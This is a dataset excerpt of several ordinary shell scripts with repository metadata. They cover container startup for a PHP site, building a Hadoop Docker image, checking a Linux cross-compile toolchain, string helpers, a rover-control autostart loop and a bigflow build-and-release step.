# setup server root
test ! -d "$HOME_SITE" && echo "INFO: $HOME_SITE not found. creating..." && mkdir -p "$HOME_SITE"
if [ ! $WEBSITES_ENABLE_APP_SERVICE_STORAGE ]; then
echo "INFO: NOT in Azure, chown for "$HOME_SITE
chown -R nobody:nogroup $HOME_SITE
fi
if [ ! ${SYMFONY_ENV} ]; then
export SYMFONY_ENV=${SYMFONY_ENV:-prod}
fi
if [ ! ${COMPOSER_HOME} ]; then
export COMPOSER_HOME=${HOME_SITE}/.composer
fi
if [ ! -d ${COMPOSER_HOME} ]; then
mkdir -p $COMPOSER_HOME && chown nobody:nogroup -R ${COMPOSER_HOME}
fi
if [ ${STARTUP_SCRIPT} ] && [ -f "${HOME_SITE}/${STARTUP_SCRIPT}" ]; then
sed -i "s|command=.*|command=bash ${STARTUP_SCRIPT}|" /etc/supervisor/conf.d/06-startup.conf
sed -i "s/autostart=.*/autostart=true/" /etc/supervisor/conf.d/06-startup.conf
fi
# Get environment variables to show up in SSH session
eval $(printenv | awk -F= '{print "export " $1"="$2 }' >> /etc/profile)
echo "Starting Container ..."
test ! -d /home/LogFiles && mkdir /home/LogFiles
test ! -f /home/LogFiles/nginx-access.log && touch /home/LogFiles/nginx-access.log
test ! -f /home/LogFiles/nginx-error.log && touch /home/LogFiles/nginx-error.log
test ! -f /home/LogFiles/php7.1-fpm.log && touch /home/LogFiles/php7.1-fpm.log
test ! -d /home/LogFiles/supervisor && mkdir /home/LogFiles/supervisor
chown -R nobody:nogroup /home/LogFiles
chown -R nobody:nogroup /run/php
sed -i "s|loglevel=.*|loglevel=${SUPERVISOR_LOG_LEVEL:-warn}|" /etc/supervisor/conf.d/00-supervisord.conf
rm -rf /var/log/supervisor
ln -s /home/LogFiles/supervisor /var/log/supervisor
phpenmod opcache
if [ -f "${HOME_SITE}/php.ini" ]; then
cat "${HOME_SITE}/php.ini" >> /etc/php/7.1/fpm/php.ini
fi
if [ -f "${HOME_SITE}/php-cli.ini" ]; then
cat "${HOME_SITE}/php-cli.ini" >> /etc/php/7.1/cli/php.ini
fi
if [ ${APPLICATION_INSTALLED:-0} == 1 ]; then
if [ -f "${HOME_SITE}/composer.json" ]; then
sed -i "s/autostart=.*/autostart=true/" /etc/supervisor/conf.d/05-composer.conf
fi
fi
echo 'opcache.memory_consumption=128' >> /etc/php/7.1/fpm/php.ini
echo 'opcache.interned_strings_buffer=8' >> /etc/php/7.1/fpm/php.ini
echo 'opcache.max_accelerated_files=4000' >> /etc/php/7.1/fpm/php.ini
echo 'opcache.revalidate_freq=60' >> /etc/php/7.1/fpm/php.ini
echo 'opcache.fast_shutdown=1' >> /etc/php/7.1/fpm/php.ini
echo 'opcache.enable_cli=1' >> /etc/php/7.1/fpm/php.ini
echo 'opcache.memory_consumption=128' >> /etc/php/7.1/cli/php.ini
echo 'opcache.interned_strings_buffer=8' >> /etc/php/7.1/cli/php.ini
echo 'opcache.max_accelerated_files=4000' >> /etc/php/7.1/cli/php.ini
echo 'opcache.revalidate_freq=60' >> /etc/php/7.1/cli/php.ini
echo 'opcache.fast_shutdown=1' >> /etc/php/7.1/cli/php.ini
echo 'opcache.enable_cli=1' >> /etc/php/7.1/cli/php.ini
if [ ${DEBUG:-0} == 1 ]; then
ln -sf /dev/stdout /var/log/nginx/access.log
ln -sf /dev/stderr /var/log/nginx/error.log
ln -sf /dev/stderr /var/log/php7.1-fpm.log
else
ln -sf /home/LogFiles/nginx-access.log /var/log/nginx/access.log
ln -sf /home/LogFiles/nginx-error.log /var/log/nginx/error.log
ln -sf /home/LogFiles/php7.1-fpm.log /var/log/php7.1-fpm.log
fi
/usr/bin/supervisord
| true |
e01c4527c40585537cf62183120fdb49ac5e742b | Shell | limingyao/docker-files | /hadoop/generator_builder.sh | UTF-8 | 3,185 | 2.90625 | 3 | [
"MIT"
] | permissive | #!/bin/bash
if [ ! -f "./soft/hadoop-2.7.5.tar.gz" ]; then
echo "./soft/hadoop-2.7.5.tar.gz not exist"
echo "please download hadoop-2.7.5.tar.gz from https://www.apache.org/dyn/closer.cgi/hadoop/"
exit 1
fi
port=15973
ip=$(ifconfig -a | grep inet | grep broadcast | awk '{print $2}')
nohup python -m SimpleHTTPServer $port &
pid=$(ps -ef | grep SimpleHTTPServer | grep -v grep | awk '{print $2}')
echo "ip: "$ip
echo "pid: "$pid
cat > Dockerfile <<EOF
FROM limingyao/centos7-jdk8-base:latest
MAINTAINER mingyaoli@tencent.com
RUN mkdir -p /opt/hadoop && cd /opt/hadoop \\
&& wget http://$ip:$port/soft/hadoop-2.7.5.tar.gz \\
&& tar zxvf hadoop-2.7.5.tar.gz && rm hadoop-2.7.5.tar.gz \\
&& chown -R work.work /opt/hadoop/hadoop-*
RUN mkdir -p /opt/tez && cd /opt/tez \\
&& wget http://$ip:$port/soft/apache-tez-0.9.1-bin.tar.gz \\
&& tar zxvf apache-tez-0.9.1-bin.tar.gz && rm apache-tez-0.9.1-bin.tar.gz \\
&& mv /opt/tez/apache-tez-0.9.1-bin /opt/tez/tez-0.9.1 \\
&& rm -f /opt/tez/tez-0.9.1/lib/slf4j-* \\
&& cp /opt/hadoop/hadoop-2.7.5/share/hadoop/mapreduce/hadoop-mapreduce-client-co* /opt/tez/tez-0.9.1/lib/ \\
&& rm /opt/tez/tez-0.9.1/lib/hadoop-mapreduce-client-co*-2.7.0.jar \\
&& chown -R work.work /opt/tez/tez-*
RUN mkdir -p /opt/tomcat && cd /opt/tomcat \\
&& wget http://$ip:$port/soft/apache-tomcat-9.0.16.tar.gz \\
&& tar zxvf apache-tomcat-9.0.16.tar.gz && rm apache-tomcat-9.0.16.tar.gz \\
&& mv /opt/tomcat/apache-tomcat-9.0.16 /opt/tomcat/tomcat-9.0.16 \\
&& mkdir /opt/tomcat/tomcat-9.0.16/webapps/tez-ui \\
&& cp /opt/tez/tez-0.9.1/tez-ui-0.9.1.war /opt/tomcat/tomcat-9.0.16/webapps/tez-ui \\
&& cd /opt/tomcat/tomcat-9.0.16/webapps/tez-ui && unzip tez-ui-0.9.1.war && rm tez-ui-0.9.1.war \\
&& chown -R work.work /opt/tomcat/tomcat-*
RUN mv /opt/hadoop/hadoop-2.7.5/etc/hadoop/core-site.xml /opt/hadoop/hadoop-2.7.5/etc/hadoop/core-site.xml.bak \\
&& mv /opt/hadoop/hadoop-2.7.5/etc/hadoop/hdfs-site.xml /opt/hadoop/hadoop-2.7.5/etc/hadoop/hdfs-site.xml.bak \\
&& mv /opt/hadoop/hadoop-2.7.5/etc/hadoop/yarn-site.xml /opt/hadoop/hadoop-2.7.5/etc/hadoop/yarn-site.xml.bak \\
&& chmod -x /opt/hadoop/hadoop-*/bin/*.cmd && chmod -x /opt/hadoop/hadoop-*/sbin/*.cmd
ADD ./soft/conf/core-site.xml /opt/hadoop/hadoop-2.7.5/etc/hadoop/
ADD ./soft/conf/hdfs-site.xml /opt/hadoop/hadoop-2.7.5/etc/hadoop/
ADD ./soft/conf/mapred-site.xml /opt/hadoop/hadoop-2.7.5/etc/hadoop/
ADD ./soft/conf/yarn-site.xml /opt/hadoop/hadoop-2.7.5/etc/hadoop/
ADD ./soft/conf/tez-site.xml /opt/hadoop/hadoop-2.7.5/etc/hadoop/
ADD ./soft/hadoop.sh /etc/profile.d/
RUN mkdir -p /data/hadoop && chown -R work.work /data/hadoop \\
&& chown work.work /etc/profile.d/hadoop.sh \\
&& chown work.work /opt/hadoop/hadoop-*/etc/hadoop/core-site.xml \\
&& chown work.work /opt/hadoop/hadoop-*/etc/hadoop/hdfs-site.xml \\
&& chown work.work /opt/hadoop/hadoop-*/etc/hadoop/mapred-site.xml \\
&& chown work.work /opt/hadoop/hadoop-*/etc/hadoop/yarn-site.xml \\
&& chown work.work /opt/hadoop/hadoop-*/etc/hadoop/tez-site.xml
EXPOSE 8020 8042 8088 19888 50070
EOF
# docker build --no-cache -t limingyao/hadoop2.7:latest .
docker build -t limingyao/hadoop2.7:latest .
kill -9 $pid
rm nohup.out
| true |
44b71e205abcfa02e5b1c53d17b0ae6572aaa96e | Shell | open-policy-agent/opa | /build/ensure-linux-toolchain.sh | UTF-8 | 963 | 3.8125 | 4 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env bash
set -eo pipefail
case "$(uname -m | tr '[:upper:]' '[:lower:]')" in
amd64 | x86_64 | x64)
HOST_ARCH=amd64
;;
arm64 | aarch64)
HOST_ARCH=arm64
;;
*)
echo "Error: Host architecture not supported." >&2
exit 1
;;
esac
# Native build
if [ "${GOARCH}" = "${HOST_ARCH}" ]; then
if ! [ -x "$(command -v gcc)" ]; then
echo "Error: gcc not found." >&2
exit 1
fi
exit 0
fi
# Cross-compile
case "${GOARCH}" in
amd64)
PKG=gcc-x86-64-linux-gnu
CC=x86_64-linux-gnu-gcc
;;
arm64)
PKG=gcc-aarch64-linux-gnu
CC=aarch64-linux-gnu-gcc
;;
*)
echo "Error: Target architecture ${GOARCH} not supported." >&2
exit 1
;;
esac
type -f ${CC} 2>/dev/null && exit 0
if ! [ -x "$(command -v apt-get)" ]; then
echo "Error: apt-get not found. Could not install missing toolchain." >&2
exit 1
fi
apt-get update >/dev/null && \
apt-get install -y ${PKG} >/dev/null
echo ${CC}
| true |
883360f65931046eb8ff83b75a46247e4cfccb84 | Shell | apiengine/apiengine-crusty | /bin/:string | UTF-8 | 401 | 3.5 | 4 | [] | no_license | #!/bin/sh
string_startswith() {
(echo $1 | grep -q "^$2")
if [ $? = 0 ]; then
__="true"
else
__="false"
fi
}
string_endswith() {
(echo $1 | grep -q "$2$")
if [ $? = 0 ]; then
__="true"
else
__="false"
fi
}
string_contains() {
(echo $1 | grep -q "$2")
if [ $? = 0 ]; then
__="true"
else
__="false"
fi
}
| true |
73114f539c94d398f9d9220d946b864a01326edb | Shell | joehou45/chestnut-picker | /bin/autoStartRoverControl.sh | UTF-8 | 370 | 2.75 | 3 | [] | no_license | #!/bin/bash
export DISPLAY=:0
export LOGFILE=/home/nvidia/autoStartRoverControl.log
cd /home/nvidia/chestnut-picker
while :
do
echo >>$LOGFILE
echo "----------------------------------------------" >> $LOGFILE
date >> $LOGFILE
python3 -u rover_control.py &>> $LOGFILE
echo "something wrong with rover_control.py" &>> $LOGFILE
date >> $LOGFILE
sleep 1
done
| true |
d2731e0166d42692d99729279fda68aa4befc514 | Shell | iwko/bigflow | /build-and-release/build.sh | UTF-8 | 933 | 3.34375 | 3 | [] | no_license | #!/bin/bash
set -e
pip install -r resources/requirements.txt
git remote set-url origin $1
python -c 'import bamboo_build;bamboo_build.release_version_if_on_master()'
releaseVersion=$(python -c 'import bamboo_build;bamboo_build.get_bamboo_release_version()')
args_array=()
if [ -n "$2" ]; then
args_array+=("--start-time" "$2")
fi
if [ -n "$3" ]; then
workflow_id="$3"
args_array+=("--workflow" "$workflow_id")
fi
echo "bf build ${args_array[@]}"
bf build "${args_array[@]}"
[ -d ".image" ] && image_dir=".image" || image_dir="image"
[ -d ".dags" ] && dags_dir=".dags" || dags_dir="dags"
pip freeze | grep '^bigflow' | sed 's/bigflow==//' > "$image_dir/bigflow_version.txt"
echo "version=$releaseVersion" > variables.txt
if [ -n "$workflow_id" ]; then
# TODO: Remove after such logic (generate metadata about builded dags) is integrated into `bigflow`.
echo "$workflow_id" >> $dags_dir/workflow_id.txt
fi
| true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.